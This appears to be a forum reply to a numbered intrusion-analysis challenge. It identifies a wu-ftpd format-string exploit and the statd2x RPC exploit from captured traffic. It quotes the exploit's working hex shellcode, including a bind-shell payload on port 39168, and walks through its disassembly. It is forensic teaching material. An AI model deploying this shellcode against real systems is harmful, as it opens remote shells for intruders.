QUESTION 1: Can you name the FTP scanning tool that uses a half open SYN? myscan is my guess: http://www.google.com/search?q=10101+th_sport QUESTION 2: What does the FTP exploit achieve? Does it open a port, create a shell, add a user? I found some similar FTP attacks by using part of the shellcode from snort as a search string in google: http://www.google.com/search?q=%228D+5E+08+89+43+02+31%22 Some further google on wuftpd exploits: http://archives.neohapsis.com/archives/bugtraq/2000-06/0214.html http://archives.neohapsis.com/archives/bugtraq/2000-06/0229.html I think the exploit used is the first one. The word 'venglin' is the end of the shellcode for BSD. I haven't looked how the kachum.kasie.com is added, but in the first code a memcpy is used which might drop the terminating zero. From this code it looks like the BSD shell code was used on the linux box. It probably just execs a shell on port 21. Anyway the exploit didnt succeed: =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 12/09-01:22:31.169534 172.16.1.104:21 -> 207.219.207.240:1882 TCP TTL:63 TOS:0x10 ID:48231 DF *****PA* Seq: 0x110CE81E Ack: 0x33BC7446 Win: 0x7D78 TCP Options => NOP NOP TS: 105803113 126045057 35 33 30 20 4C 6F 67 69 6E 20 69 6E 63 6F 72 72 530 Login incorr 65 63 74 2E 0D 0A ect... The PASS was only used to pass in the shellcode for use with the SITE EXEC format string bug. QUESTION 5: Where in the RPC exploit code does it bind a shell to port 39168? This is a published statd exploit (statd2x): http://archives.neohapsis.com/archives/bugtraq/2000-10/0165.html From the code: char exec[] = /* any command */ "\xeb\x2d\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x89\x76\x0b\x89\x76" "\x0f\x80\x46\x0f\x08\x89\x76\x13\x80\x46\x13\x1b\x89\x46\x17\x8d" "\x56\x17\x8d\x4e\x0b\x89\xf3\xb0\x0b\xcd\x80\xb0\x01\xcd\x80\xe8" "\xce\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x5f\x2d\x63\x5f\xff" "\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"; char port[] = /* port 39168 */ "\x31\xc0\xeb\x7c\x59\x89\x41\x10\x89\x41\x08\xfe\xc0\x89\x41\x04" "\x89\xc3\xfe\xc0\x89\x01\xb0\x66\xcd\x80\xb3\x02\x89\x59\x0c\xc6" "\x41\x0e\x99\xc6\x41\x08\x10\x89\x49\x04\x80\x41\x04\x0c\x88\x01" "\xb0\x66\xcd\x80\xb3\x04\xb0\x66\xcd\x80\xb3\x05\x30\xc0\x88\x41" "\x04\xb0\x66\xcd\x80\x89\xce\x88\xc3\x31\xc9\xb0\x3f\xcd\x80\xfe" "\xc1\xb0\x3f\xcd\x80\xfe\xc1\xb0\x3f\xcd\x80\xc7\x06\x2f\x62\x69" "\x6e\xc7\x46\x04\x2f\x73\x68\x41\x30\xc0\x88\x46\x07\x89\x76\x0c" "\x8d\x56\x10\x8d\x4e\x0c\x89\xf3\xb0\x0b\xcd\x80\xb0\x01\xcd\x80" "\xe8\x7f\xff\xff\xff"; > Can you be more specific? I still can't find the bind to poprt 39168 > in the char port[] code. Most of the time the zero is created differently: Here is part of the code (the jmp eventually returns to port+4): 0x8049520 : xor %eax,%eax 0x8049522 : jmp 0x80495a0 0x8049524 : pop %ecx 0x8049525 : mov %eax,0x10(%ecx) <- writing zeros 0x8049528 : mov %eax,0x8(%ecx) <- writing zeros 0x804952b : inc %al 0x804952d : mov %eax,0x4(%ecx) 0x8049530 : mov %eax,%ebx 0x8049532 : inc %al 0x8049534 : mov %eax,(%ecx) 0x8049536 : mov $0x66,%al 0x8049538 : int $0x80 Above is a sys_socket call (socketcall with arg 1). 0x804953a : mov $0x2,%bl 0x804953c : mov %ebx,0xc(%ecx) 0x804953f : movb $0x99,0xe(%ecx) 0x8049543 : movb $0x10,0x8(%ecx) 0x8049547 : mov %ecx,0x4(%ecx) 0x804954a : addb $0xc,0x4(%ecx) 0x804954e : mov %al,(%ecx) 0x8049550 : mov $0x66,%al 0x8049552 : int $0x80 Above is a sys_bind call. You see the 0x99 being written to an area already containing zero's 0x8049554 : mov $0x4,%bl 0x8049556 : mov $0x66,%al 0x8049558 : int $0x80 Above is the sys_listen call Simple as that :-) Job